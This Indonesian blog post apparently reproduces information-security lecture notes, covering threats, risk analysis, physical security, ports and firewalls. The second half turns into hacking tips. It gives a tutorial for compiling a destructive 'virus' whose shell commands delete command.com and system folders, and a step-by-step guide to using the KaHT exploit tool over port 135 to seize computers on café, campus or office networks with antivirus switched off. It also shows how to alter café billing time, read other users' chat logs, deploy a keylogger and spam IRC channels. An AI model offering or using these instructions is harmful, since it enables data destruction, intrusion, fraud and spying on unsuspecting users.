Keamanan Sistem informasi Bab 2


Definisi Keamanan (Security) adalah melindungi aset-aset dari ancaman.

Aset-aset dapat berupa informasi, perangkat keras, perangkat lunak, perangkat pendukung (peripheral supplies), orang (people), media komunikasi, kemampuan pemrosesan (processing capabilities), atau uang (dinyatakan dalam bentuk dari informasi tersebut bila dijual).

(Cooper, James Arlin, Computer and Communication Security Strategies for the 1990s, McGraw-Hill 1989, page 11).

Istilah komunikasi (communication) yang dimaksud adalah komunikasi komputer. Aliran data yang mengalir dari satu komputer ke komputer lain atau dari komputer ke perangkat pendukung lain seperti misalnya printer.

Ancaman (threats) terhadap aset dapat berupa:

  1. Orang / personil yang menyalahgunakan jabatannya untuk mencari informasi untuk kepentingan spionase, terorisme, organisasi kejahatan, atau kejahatan yang dilakukan untuk kepentingan pribadi.
  2. Orang / personil yang disandera untuk diperas informasinya demi kepentingan spionase, terorisme, organisasi kejahatan, atau kejahatan yang dilakukan untuk kepentingan pribadi.
  • Kesalahan penanganan meliputi insiden yang terjadi akibat kecerobohan yang dilakukan oleh orang, kerusakan perangkat keras, kerusakan perangkat lunak, terputusnya komunikasi, dan permasalahan lingkungan seperti api, air, listrik, AC.
  • Juga Kejadian Alam seperti petir, gempa bumi, angin ribut, banjir, korsluiting listrik.
  • Keamanan diukur dari seberapa besar ancaman yang diakibatkan oleh rancangan ruangan, konfigurasi komputer, prosedur penanganan data dan informasi.

Pendekatan dasar keamanan komputer dan komunikasi komputer:

  1. Mengidentifikasi aset-aset yang harus dilindungi.
  2. Mengidentifikasi kemungkinan timbulnya ancaman terhadap aset-aset tersebut.
  3. Mengidentifikasi kemungkinan terjadinya kerusakan yang ditimbulkan bila terjadi pencurian.
  4. Mempertimbangkan kemungkinan resiko-resiko yang terjadi akibat timbulnya ancaman
  5. Jika diperlukan, memilih perangkat perlindungan yang dibutuhkan untuk memperkecil timbulnya resiko.
  6. Memonitor setiap kejadian agar bila terjadi sesuatu dapat cepat ditangani.

Perhatian yang berhubungan dengan pendekatan langsung:

  1. Aset-aset yang terbatas pada hal-hal fisik seperti komputer dan informasi yang memiliki nilai. Beberapa aset yang dilupakan adalah personil (termasuk kemampuan dan pengetahuan yang dimiliki), reputasi perusahaan, kemampuan untuk menangani fungsi-fungsi bisnis, kemampuan untuk mengelola pegawai, kemampuan untuk menghadapi persaingan, kemampuan untuk memenuhi kebutuhan tenaga kerja.
  2. Ancaman yang mengakibatkan hilangnya kepercayaan para pelanggan kepada perusahaan sehingga customer berpaling ke perusahaan lain, kalahnya perusahaan dalam persaingan bisnis dengan perusahaan sejenis.
  3. Ancaman spesifik tidak selalu berhubungan langsung kesatu masalah. Ada banyak ancaman yang tertuju pada satu aset, tetapi ada juga satu ancaman yang tertuju ke banyak aset. Contoh: listrik mati yang menyebabkan seluruh aktivitas pengolahan data berhenti. Macetnya printer bisa disebabkan kertas yang nyangkut didalam printer, ngadatnya selektor switch, atau ada komputer lain yang sedang mengaksesd printer tersebut.

Analisa Resiko

e = p v

e = Annual Loss Expectancy (ALE) = prakiraan kehilangan

p = probabilitas banyaknya kerusakan selama setahun

v = nilai aset

Konsep dasar keamanan secara fisik

Ada 2 konsep:

  1. Membangun sebuah tembok keamanan untuk mendukung struktur keamanan
  2. Membangun konfigurasi banyak penghalang (multiple barrier) untuk mendukung keamanan

Contoh: mesin ATM kartu dan PIN (Personal Identification Number) dikirim terpisah

Ada 7 hal yang berhubungan dengan keamanan fisik:

  1. Intrusion Prevention à cepat tanggap dalam waktu yang sangat singkat mengatasi masuknya penyusup.

Meliputi:

  1. a. Facility Deemphasis

Ruang komputer biasanya dilengkapi dengan jendela. Jendela harus dilengkapi dengan teralis dan pelindung kaca. Banyak kasus menjelaskan bahwa jendela juga dapat menjadi sumber bencana. Misal seorang demonstran melempari kaca jendela dengan batu, serpihan kaca dan batu selain dapat merusak perangkat komputer, mengotori ruangan juga dapat melukai personil yang ada diruangan ketika hal itu terjadi.

  1. Fences (Pagar)

Dapat sedikit menghalangi masalah penyusup, paling tidak dapat menghambat masuknya penyusup sehingga memberi kesempatan kepada penjaga untuk bertindak.

  1. Multiple Barrier (penghambat berlapis-lapis)

Dilakukan dengan pemeriksaan orang-orang yang memasuki ruangan komputer, keharusan menggunakan/memasukkan login dan password pada saat menggunakan perangkat komputer.

  1. d. Dinding

Penyusup umumnya masuk melalui jendela atau atap. Pemasangan firewalls (dinding tahan api) pada atap akan mengurangi kemungkinan masuknya penyusup dari atap.

  1. e. Penguncian Mekanis

Penggunaan kunci mekanis untuk mengunci ruangan, komputer dan perlengkapan pendukung, membantu menghambat penyusup mencuri perangkat keras maupun lunak yang tersimpan.

  1. f. Penguncian Elektronis

Pengunci elektronis yang dipasang diruang komputer maupun pada perangkat komputer sebagai bagian dari tambahan dukungan pada pengunci mekanis sangat membantu menghambat dan mempersulit pencuri untuk mencuri aset yang dimiliki.

  1. g. Penjaga

Adanya penjaga/pengawas ruangan komputer membantu mengurangi penyusup melakukan aksinya, paling tidak membuat penyusup/pencuri berpikir dua kali sebelum melakukan aksinya.

  1. h. Pengawas elektronis

Dengan melibatkan penggunaan CCTV membantu mengawasi ruangan membantu mengurangi niat penyusup untuk melakukan aksinya.

2. Intrusion Detection

Dilakukan dengan memasang:

  1. Disturbance sensor (sensor pendeteksi keributan) seperti pendeteksi gerakan (position-sensitive mercury switch), piezoelectric tranducer (sensor panas), geophones (pendeteksi getaran), pendeteksi perubahan posisi berdasar impedansinya.
  2. Alarm, yang berbunyi begitu ada penyusup yang masuk tanpa ijin.
  3. Sensor tambahan seperti sensor cahaya, CCTV, capacitance sensor yang mendeteksi perubahan kapasitansi pada ruangan yang diawasinya.
  1. 3. Proper Information Destruction

Umumnya informasi tersimpan dalam media seperti disket, pita magnetis, dan harddisk yang rentan terhadap penghapusan akibat tertimpa informasi lain (overwritten), dihapus (delete). Ada beberapa hal yang berhubungan dengan hilangnya informasi:

  1. a. Overwriting

Misalnya karena penggunaan Norton Wipedisk yang di set otomatis sehingga ada data yang seharusnya tidak dihapus tetapi menjadi terhapus karena lupa mematikan fasilitas otomatis pada Norton Wipedisk yang proses penghapusannya dengan menulisi 0 dan 1 secara acak berulangkali sehingga dibutuhkan perangkat lunak yang berharga mahal untuk menyelamatkan data tersebut yang mungkin harganya jauh lebih mahal dibandingkan nilai dari data yang terhapus tersebut.

  1. b. Degaussing

Penghapusan dengan cara menghilangkan sifat magnetis pada pita magnetis atau harddisk dan kemudian memagnetisasi kembali pita magnetis ataupun harddisk keposisi default / standar(sebelum digunakan). Penghapusan dengan cara ini hampir mustahil untuk menyelamatkan kembali informasi yang tersimpan. Teknik ini biasanya dilakukan untuk menghilangkan jejak agar informasi yang tersimpan didalamnya benar-benar tidak bocor.

  1. c. Burning

Membakar informasi yang tersimpan pada kertas, media magnetis, dan semiconductor memory seperti flash disk.

Penyelamatan kembali biasanya hanya sepotong-sepotong karena ada bagian-bagian yang tidak terbakar sempurna. Pada kertas masih dimungkinkan diselamatkan dengan bantuan teknologi canggih dan bahan-bahan kimia tertentu yang memungkinkan tulisan-tulisan muncul kembali dan bisa terbaca.

  1. d. Shredding

Penghancuran informasi pada kertas, disket, mikrofilm dengan menggunakan mesin penghancur kertas. Cara ini juga sangat sulit diselamatkan. Dibutuhkan personil yang benar-benar terlatih dan sabar untuk menyusun kembali bagian demi bagian sehingga kembali utuh. Biasanya dinas rahasia yang memiliki kemampuan seperti ini.

  1. 4. Power Protection

Gangguan yang umum terjadi adalah tegangan listrik yang tidak stabil, sering padam, casing nyetrum, petir dll.

Untuk mengatasi dapat menggunakan stabilizer atau UPS (Uninterruptable Power Supply), casing nyetrum diatasi dengan memasang kabel pada casing dan kemudian dihubungkan ke ground, sedang untuk mengantisipasi terkena petir bisa dengan cara memasang surge protector.

  1. 5. Fire Protection

Dilakukan dengan cara memasang pemadam kebakaran jenis serbuk kering tipe A,B,C

Tipe A untuk kayu, kertas, dan plastik

Tipe B untuk bahan kimia(chemical)

Tipe C untuk listrik(electricity)

  1. 6. Water Protection

Ruang komputer sebaiknya dijauhkan dari daerah yang lembab ataupun yang mudah kemasukan air seperti hujan, banjir, maupun toilet.

  1. Contingency Planning

Dilakukan dengan cara membackup secara teratur serta mengasuransikan ruangan beserta seluruh isinya.

Lingkungan Keamanan Personil (Personnel Security Environment)

Personil selain merupakan aset yang harus dilindungi ternyata juga merupakan bagian dari ancaman. Untuk mengatasi adanya ancaman yang datang dari personil maka hal yang harus dilakukan pada waktu merekrut personil adalah:

  1. Mempelajari latar belakang kehidupan personil tersebut seperti asal-usulnya, orangtuanya, pasangan hidupnya, daerah tempat tinggalnya dsbnya.
  2. Memonitor kejiwaan personil tersebut setiap waktu.

Alasan seorang personil berkhianat pada perusahaan:

  1. Jatuh cinta pada sesorang yang ternyata seorang agen.
  2. Masalah penghasilan
  3. Masalah karier

Port dan Protocol

Protocol adalah suatu standarisasi pada komputer untuk proses pertukaran informasi (a standardized way for computers to exchange information).

Ports adalah saluran akses (access channel).

Ports memiliki nomor dari 1 sampai dengan 65535, antara lain:

–         Ports Umum (Well Known) mulai nomor 1 sampai dengan 1023

–         Ports Terdaftar (registered) mulai nomor 1024 sampai dengan 49151

–         Ports Dinamis dan atau Pribadi (Private) mulai nomor 49152 sampai dengan 65535

Pemahaman istilah Bindings pada jaringan:

Sering disebutkan pada sistem operasi berbasis Windows bahwa “a network adapter is bound to TCP/IP” atau “NETBEUI is bound to File and Printer sharing”.

Untuk memperjelas hubungan relasi (relationships) pada istilah binding, kita kenali dahulu berbagai komponen jaringan yang terdapat pada 3 (tiga) lapisan

Dari dua contoh di atas dapat diketahui bahwa proses binding adalah membuat ikatan komunikasi antara satu komponen dengan komponen lain yang berbeda lapisan (layer).

TCP/IP (Transmission Control Protocol/Internet Protocol) secara sederhana dapat juga berfungsi sebagai identitas diri seseorang agar dapat dikenali oleh orang lain. TCP/IP inilah yang berhubungan langsung dengan internet.

NetBEUI (NetBIOS Extended User Interface) adalah protocol yang dirancang untuk digunakan pada Windows for Workgroups yang dapat digunakan pada jaringan dengan beban 20 hingga 200 workstation). NetBEUI digunakan untuk grouping pada jaringan lokal.

IPX/SPX (Internetwork Packet Exchange/Sequenced Packet Exchange) adalah protocol jaringan untuk ethernet card yang dikembangkan oleh Novell untuk memperlancar komunikasi antar komputer dengan sistem operasi lain selain Windows. Para pecandu game lewat internet pasti memerlukan IPX/SPX karena protocol ini digunakan untuk membantu NetBEUI pada penggunaan inter-game communication.

Koneksi Peer to Peer Topologi Star Dengan Sistem Operasi Win 98 / Win ME

Perangkat yang dibutuhkan:

  • 2 atau lebih komputer yang berisi sistem operasi Windows 98 dan masing-masing sudah dilengkapi dengan Network Interface Card (NIC)
  • beberapa kabel UTP dengan panjang sesuai kebutuhan yang sudah dilengkapi dengan konektor RJ-45 (pin yang digunakan adalah 1,2,3,6) Untuk kabel UTP yang terkoneksi ke pin 3 dan 6 harus yang terpilin.
  • Satu buah HUB dengan jumlah koneksi sesuai kebutuhan.

Hubungkan kabel UTP ke NIC dikomputer dan ke Hub, lakukan hal yang sama untuk setiap komputer yang akan dihubungkan dalam satu jaringan.

Selanjutnya, lakukan penyetelan Windows pada setiap komputer. Langkahnya:

  1. Klik 2 kali Network Neighborhood (atau My Network Place pada Win ME) à klik kanan lalu pilih Properties à Pada Network, kotak Configuration, pilih Client for Microsoft Networks, lalu klik Properties à Pada kotak General hilangkan tanda Ö pada Log on to Windows NT domain, lalu klik OK

2.Pada Network, pilih kotak Identification, isi Computer name, Workgroup, dan Computer Description, lalu klik OK. Catatan: untuk nama Workgroup usahakan dengan nama yang sama untuk tiap komputer yang terkoneksi ke jaringan ini.

Lihat contoh pada gambar dibawah ini.

3. Pada Network, kotak  Configuration, pilih TCP/IP, lalu klik Properties à pada kotak IP Address, klik radio button Specify an IP address, lalu isikan IP Address dan Subnet Mask. Lihat contoh dibawah ini.

4. Bila NetBEUI pada Network kotak Configuration belum ada, lakukan langkah berikut ini:

Pada Network, kotak Configuration, klik Add à pilih Protocol, lalu klik Add à pada kolom Manufactures, pilih Microsoft à pada kolom Network Protocols, pilih NetBEUI, lalu klik OK.

5. Penyetelan Jaringan dengan Win 98 atau Win ME selesai. Lakukan hal ini pada setiap komputer yang terhubung ke jaringan ini. Untuk menguji apakah semua komputer yang terhubung ke jaringan sudah saling mengenal, klik 2 kaliNetwork Neighborhood dan lihatlah apakah dibawah tulisan Entire Network terdapat nama-nama komputer yang terhubung ke jaringan. Bila tidak, periksa lagi koneksi jaringannya dan penyetelan Windowsnya.

MENGENAL FIREWALL DAN PERANNYA

Diambil dari: Komputek Edisi 344

Kata Firewall berasal dari firewall yang digunakan sebuah pasukan (bomba) untuk menghalangi kobaran api. Di dunia sekuritas komputer, firewall adalah peralatan keamanan yang berada di antara internet dan komputer anda. Peralatan ini bisa berupa software untuk melindungi sebuah pc saja, atau dalam bentuk hardware untuk melindungi seluruh jaringan komputer (LAN).

Firewall fungsinya menilai setiap paket data di antara komputer dengan internet, dan membuat keputusan berdasarkan arahan yang telah dibekalkan yakni menghalangi, membiarkan atau melepaskan (permit, block, ignore). Selain itu, firewall juga menyimpan log atau catatan aktivitas komputer untuk admin, yang digunakan untuk melihat apa yang telah dilakukan terhadap komputer.

Firewall bisa dibagi-bagi dalam beberapa jenis.

Secure Design (http://www.sdesign.com/securitytest/firewalls.html) membagi firewall dalam 3 jenis, diantaranya:

–          personal firewall, software untuk komputer pribadi

–          software untuk server

–          hardware firewall

Tentu, masing-masing jenis firewall memiliki kelebihan dan kekurangan tersendiri. Personal firewall yang biasanya murah harganya atau malah gratis, tapi hanya cocok untuk melindungi sebuah komputer saja.

Sedang, hardware firewall lebih cocok untuk jaringan komputer yang besar (multi-user network), sayangnya harganya lebih mahal dan memerlukan tenaga terlatih untuk mengendalikannya karena lebih sulit pengoperasiannya.

Pentingnya Firewall

Untuk menghalangi ‘orang luar’ mencoba-coba masuk kedalam pc anda dan menapis ‘orang dalam’ yang ingin membuat hubungan ke internet. Orang luar ini bisa saja berupa port scanner, trojan, cracker, hacker, atau bisa juga Code Red.

Sementara, orang dalam bisa juga berupa trojan server yang berada dalam pc anda, spyware, atau software mencoba melakukan koneksi ke internet. Sebagai contoh, setelah memasang firewall, mungkin saja anda mendapati word.exe yang mencoba membuat hubungan ke internet. Tentu, anda akan memblokir karena tidak semestinya word mengakses internet.

Perlukah pasang firewall? Coba saja anda mengunjungi site http://www.hackerwatch.org/probe/

Lalu ke http://www.pcflank.com/test.htm

dan terakhir ke http://grc.com/default.htm (dan cari ShieldsUP!)

Halaman-halaman tersebut bakal membuat scanning dan men-telnet pc anda. Nah, jika pc anda tidak dilindungi oleh firewall, maka site-site ini akan memberitahu bahwa pc anda sedang dalam kondisi yang membahayakan.

Tips di IRC
Nih tips untuk para chatter IRC, mau tahu ? Pertama-tama..
Sebelum anda memulai chatting dengan mIRC ada 3 hal yang sangat penting yang harus anda perhatikan :

Periksa pada option Connect lalu pada identd, gantilah “user id” jika ada nomor room tertulis disini.

Periksa pada option IRC lalu pada Logging, gantilah menjadi “none” pada “automatically logs” jika posisi diluar itu. Periksa pada Windows Task Manager apakah ada Keylogger terpasang.

Tips diatas itu adalah kewaspadaan standard agar kita tidak mudah diketahui teman chatter kita.
Efek jika tidak menuruti tips diatas maka efeknya adalah :

1. jika “user id” tersebut memberi angka / nama room saat anda sedang chatting maka anda sama saja membuka diri
2. Jika pada logging bukan “none” maka bersiap-siaplah isi chattingan anda dilihat orang ketiga
3. Ini yang susah diperiksa tapi jarang ada user melakukan halini jika mau lebih jelas detect saja dengan program.

Semoga informasi diatas dapat membantu dan menambah pengetahuan anda.

Triks di IRC :
Cara agar bisa masuk ke dal.net dal.net dimana sebelumnya tidak bisa masuk karena trojan atau virus ? masuklah ke irc.server.telkom.net.id setelah itu baru baru membuka server dal.net, jika masih tidak bisa maka anda dapat mencari IRCOP di dal.net.

Bagaimana cara melacak keberadaan teman chat kita ? Whois saja chatter tersebut lalu cocokkan ip addreasnya dengan daftar ip addreas warnet Yogya di samping kanan. Jika ip addreas anda tidak ada dalam daftar maka anda dapat menggunakan pelacakan lain seperti http://www.apnic.org

Bagaimana cara melacak room teman chat kita ? Whois saja chatter tersebut lalu lihat sebelah kiri dari sebelum tanda “@ip addreas”, jika ada angka maka kemungkinan besar dia di room tersebut.

Bagaimana kita ingin mencari teman chat di warnet sendiri (BOT feature)? di channel #yogyakarta cukup ketikkan !seen *!*@ip addreas warnet anda,

Bagaimana kita ingin mencari teman chat di warnet sendiri ? (Yang stabil ! dal.net feature) ? /who #nama channel *@ip addreas warnet

Bagaimana kita ingin mencari nickname teman kita di channel #yogyakarta ? cukup mudah, ketikkan di channel #yogyakarta !seen nickname teman kita.

Bagaimana cara kita memata-matai teman chat kita di satu warnet ? Masuklah di Network Neighboure lalu cari nomor room teman chat kita lalu masuklah di logs mirc teman kita biasanya di “c:\program files\mirc\logs”.

Bagaimana cara kita meyakinkan bahwa teman chat kita disuatu room memang benar adanya memakai nickname yang kita maksud ? Masuklah di Network Neighboure lalu cari nomor room teman chat kita lalu masuklah ke directory mirc teman kita biasanya di “c:\program files\mirc” lalu buka file mirc.ini.

Proteksi diri di IRC dapat dilakukan dengan PSY dan Proxy tapi yang umum dan tidak memakan biaya adalah menggunakan proxy, bagimana caranya ? Carilah proxy di google, kemudian pastekan ke option mIRC yaitu pada “connect” lalu “firewall’, firewall support diganti “server”, protocol diganti “proxy” lalu tinggal anda isi hostname dan portnya sesuai dengan proxy yang anda dapatkan.

Cara membuat program perusak (Virus)

Membuat program perusak (virus) merupakan keinginan sebagian para pemula komputer, tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali, anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda cara membuat program perusak (virus) yang sangat sederhana sekali tapi sangat mematikan bahkan bisa dikatakan lebih mengerikan dari program perusak manapun.

Pertama kali skill yang anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk berkreasi dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda dapat mendownloadnya di Google.

Diatas adalah tampilan Turbo Basic, jika anda buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code program perusak.

shell “Perintah DOS”

dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda membuat :

shell “c:”
shell “cd\”
shell “del command.com”

Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna komputer tidak dapat booting, kita contohkan yang lain.

shell “c:”
shell “cd\”
shell “deltree /y mydocu~1”
shell “deltree /y windows”
shell “deltree /y progra~1”

Diatas adalah contoh menghapus Directory My Document, WIndows dan Program FIles, sangat fatal bukan ?

Setelah anda selesai membuat programnya maka anda save dahulu, caranya pilih File lalu Save lalu beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi, caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile lalu anda enter, maka source code tersebut akan menjadi file EXE.

Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada program, dari tutorial diatas, anda dapat berkreasi sendiri bagaimana virus buatan anda dapat berjalan sesuai dengan anda inginkan, perlu diketahui bahwa TIDAK ADA SATU ANTIVIRUS DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows, hehe

Untuk informasi sekali lagi bahwa penulis tidak bertanggung jawab apapun yang anda lakukan dengan tutorial ini tapi ini semoga dapat dijadikan referensi bahwa anda untuk harus sangat hati-hati dalam membuka file EXE.

Cara masuk ke DOS pada Windows XP yang di lock

Banyak warnet yang membatasi akses gerak kita di Windows seperti fasilitas DOS, WIndows Explorer, setting dan sebagainya dalam keadaan tidak dapat kita sentuh, huh, emang nyebelin kalo kita bener-bener perlu akses ini🙂 Family Code punya jawaban🙂

Cara masuk di DOS pada Windows XP yang serba di lock fasilitasnya :
1. Pada icon dalam dektop atau start menu di klik kanan, lalu pilih properties

Cara masuk di komputer client / server berbasis Windows XP lewat DOS

Pertama-tama anda harus mendownload 2 program penting yaitu :

– KaHT : Download KaHT
– Internet Maniac : internet maniac

Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe
Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pakek WINZIP atau pakek apa.
Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara.

Untuk Windows XP
Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan.

Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini)🙂
Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul
(Alternatif cara yang cepat dapat mengklik My Network Place / Network Neighbourhood saja)

Setelah kamu dapetin sasaran computer yang mau di masukin / diremote maka kamu langsung aja kamu jalankan program Internet Maniac, masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki.

Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting, tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat.

Cara masuk DOS Mode
Untuk Windows XP :
Masuklah ke Start, All programs, Accessories lalu Command Prompt
Untuk Windows 95/98/Me/NT/2000
Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt

Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di C:\KaH) maka ketikkan “CD\KaHT” dan seterusnya.

Jika sudah, ini saatnya…

Ketikkan “KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran.
kalau bingung bisa begini : “KaHT Ip1 ip2”
ip1 : ip awal yang discan
ip2 : ip terahkir yang discan

Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho.
Maka ketikkan saja “KaHT 192.168.0.0 192.168.0.1” lalu enter aja
Nah disini nanti program akan bekerja otomatis.
Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di “c:\windows\system” milik komputer tujuan / sasaran setelah pen-scan-an selesai.
Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa.

Pingin biaya warnet kita lebih murah ? gampang masuk aja di billing server, ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus nanti ketahuan ama operator warnetnya, hehe.

Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus / kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut, biasanya seh di C:\Program Files\MiRC, buka file MiRC.INI, lalu Log IRC di On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat “/logs” maksudnya kalau tadi di C:\program Files\MiRC program MiRCnya maka cukup masuk aja di C:\Program Files\MiRC\Logs nanti disitu ada file-file log hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe, kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya atau periksa di MiRC.INI, gampangkan.

Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa lho, delete aja file-file systemnya, hehe.

Diatas cuman kreasi dikit aja, kamu bisa aja memanfaatkannya jauh lebih bermanfaat dari pada diatas.

Child Safe : Download program Child Safe

Emang mungkin sekarang penggunaan keylogger udah bukan zamannya, masa-masa kejayaannya mungkin emang udah lewat, tapi sebenarnya program keylogger tetap saja berguna dan family code udah meneliti sebuah program keylogger dari yang terbaik dan yang pernah ada, kebanyakan program keylogger emang banyak keterbatasan entah ditambahin banner, kedetect jadi trojan dan sebagainya tapi sebuah revolusioner program keylogger udah ada.

Emang seh sebenere ini program buat orang tua yang khawatir anak-anaknya maen yang gak-gak ama komputernya, emang ini dah bukan hal yang umum, sejak dunia internet mulai ramai gambar-gambar yang sebenere cuman layak dikonsumsi oleh para remaja diatas 17 tahun ternyata udah mulai lirik ama remaja-remaja dibawah umur 17 tahun, untuk itulah Child Safe tercipta !

Seiring perkembangan zaman ternyata Child Safe menyimpan fasilitas yang luar biasa dan ga bisa dianggap remeh oleh para pengguna komputer kemampuannya, mungkin udah terlalu banyak orang yang dikerjain ama keylogger, tapi program ini benar-benar bukan hanya sekedar keylogger, fasilitasnya benar-benar bakal membuat kita-kita kelimpungan ngatasin masalah ginian, hehe.

Ada banyak fasilitas terkandung dalam program mengerikan ini, tapi program ini intinya mempunyai 3 kemampuan spy, dan spy nya sebagai berikut :

View Activity Logs
Mampu merekam segala aktifitas komputer disertai dengan waktunya yang sangat akurat

View Keystroke Log
Mampu merekam segala ketikan komputer disertai dengan waktunya yang sangat akurat

View Screenshoot Log
mampu memotret tampilan komputer dalam waktu yang bisa kita tentukan sendiri

Selain dari ketiga hal diatas, masih banyak fasilitas lainnya seperti menge-block website dan sebagainya, yang tentu saja semuanya mempunyai setting yang dapat kita atur untuk kebutuhan kita sendiri plus hasil rekamannya bisa dikirim via-email.
Luar biasa bukan ?

Sebagai catatan program ini pernah masuk diartikel tabloid komputer ternama di Indonesia karena memang kehebatannya yang pantas dikasih SUPER JEMPOL!

Kedasyatan Hennes Script NW v0.61 IRC

Hennes Script NW v0.61 IRC : Download hennes Script NW v0.61

Percayakah anda bahwa dengan script ini anda bisa mendapatkan puluhan kenalan baru bahkan mungkin ratusan dengan hitungan menit ? Anda harus coba jika anda sering mencari teman lewat Via IRC, karena script ini benar-benar hebat dalam melakukan mengirim pesan ke chatter-chatter, dan selain itu juga juga bisa diandalkan untuk inviter dan advertising apa saja, wow! Lalu apa yang membuat kemampuan script ini begitu hebat ? dan bagaimana cara kerjanya ? apa kelemahannya ?

Script ini mampu memberikan pesan ke seluruh chatter dalam 1 channel meskipun anda langsung di ban oleh AOP, SOP bahkan founder waktu anda mengirim pesan oleh chatter-chatter, tapi pesan anda ke chatter tersebut tidak akan hilang / atau berhenti, tapi pengiriman pesan terus berjalan, bayangkan, apa kurang hebat ? tapi script ini mempunyai kelemahan yaitu kemampuan ini tidak akan berjalan jika anda masuk ke channel besar kayak #jakarta, #bandung, #yogyakarta, #solo, #semarang dan sebagainya, mengapa ? karena bagaimana mungkin kita chatting dengan semua orang di channel dalam 1 – 2 detik. jelas langsung disconect, cocoknya script ini dijalankan di channel yang ga begitu rame kaya #manado, #purwokerto, #yogya (kalo pas sepi) dan sebagainya.

Bagaimana cara menjalankan fasilitas ini ?
Pada saat anda sudah connect ke dal.net dan masuk channel maka segera klik kanan saja pada room channel, lalu pilih pilihan other dan pilih pilihan mengirim pesan ke siapapun, dan tulis aja pesannya, nanti para chatter jika menjawab maka anda akan terasa di ajak chat duluan, hehe🙂

Sebenarnya banyak program-program luar biasa lainnya yang musti di punyai oleh anda para member, hanya saja family code disini memberikan informasi langka yang programnya ga ada di rental CD manapun di pelosok tanah air, menurut surfey Family Code, program-program hacker dan pemecah password udah banyak sekali di rental-rental CD seperti Passware Kit, trojan, backdoor dan lain-lainnya dan tentu saja semuanya bisa anda mudah dapatkan dengan sedikit money, jika anda merasa malas ke rental maka anda dapat langsung ke google aja mencari programnya, banyak banget, http://www.jasakom.com adalah sumber ilmu yang dapat anda pelajari sendiri.

~ oleh 12puby pada 17 Mei 2010.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: